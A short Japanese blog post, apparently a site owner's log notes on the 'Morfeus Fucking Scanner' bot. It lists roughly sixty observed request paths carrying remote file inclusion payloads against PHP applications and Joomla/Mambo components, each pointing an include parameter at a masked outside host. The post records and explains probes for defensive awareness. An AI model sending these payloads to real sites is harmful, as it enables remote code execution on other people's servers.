Morfeus Fucking Scanner - ∇ナぁーブらー∂かっフぇー∇

PHP系の欠陥を探すスキャナであるらしい.以下のようなヘッダが見られるのでCGIプロキシ状態になっているものを探しているらしい.

GET /components/com_simpleboard/image_upload.php?sbp=http://XXX.XXX.XXX.XXX/YYY/ZZZ/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: IP.AD.DR.ESS
Connection: Close

他にも以下のようなGETリクエストが見られる.

/BE_config.php?_PSL[classdir]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/SQuery/lib/armygame.php?libpath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/SQuery/lib/gore.php?libpath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/WebCalendar/ws/get_events.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/WebCalendar/ws/get_reminders.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/WebCalendar/ws/login.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/admin/includes/createemails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/admin/includes/send_emails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/calendar/ws/get_events.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/calendar/ws/get_reminders.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/calendar/ws/login.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/cbcms/mod_cbsms_messages.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/classes/adodbt/sql.php?classes_dir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_forum/download.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_hashcash/server.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_performs/performs.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_simpleboard/image_upload.php?sbp=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_smf/smf.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/createemails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/dokeos/claroline/auth/ldap/authldap.php?includePath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/fclick/show.php?path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/forum/components/com_performs/performs.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/gallery/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/includes/kb_constants.php?module_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/index.php?page=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/live/help.php?css_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/mambo/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/mod_cbsms_messages.php?mosConfig_absolute_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/Forums/admin/index.php?phpbb_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/My_eGallery/public/displayCategory.php?adminpath=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/phorum/common.php?db_file=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/phplive/help.php?css_path=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/send_emails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/skins/advanced/advanced1.php?pluginpath[0]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/spaw/spaw_control.class.php?spaw_root=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/stoma.php?lang=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/ubbthreads/addpost_newpoll.php?addpoll=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webcalendar/ws/get_events.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webcalendar/ws/get_reminders.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webcalendar/ws/login.php?includedir=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/
/wikiwig/_wk/wk_lang.php?WK[wkPath]=http://XXX.XXX.XXX.XXX/YYY/ZZZ/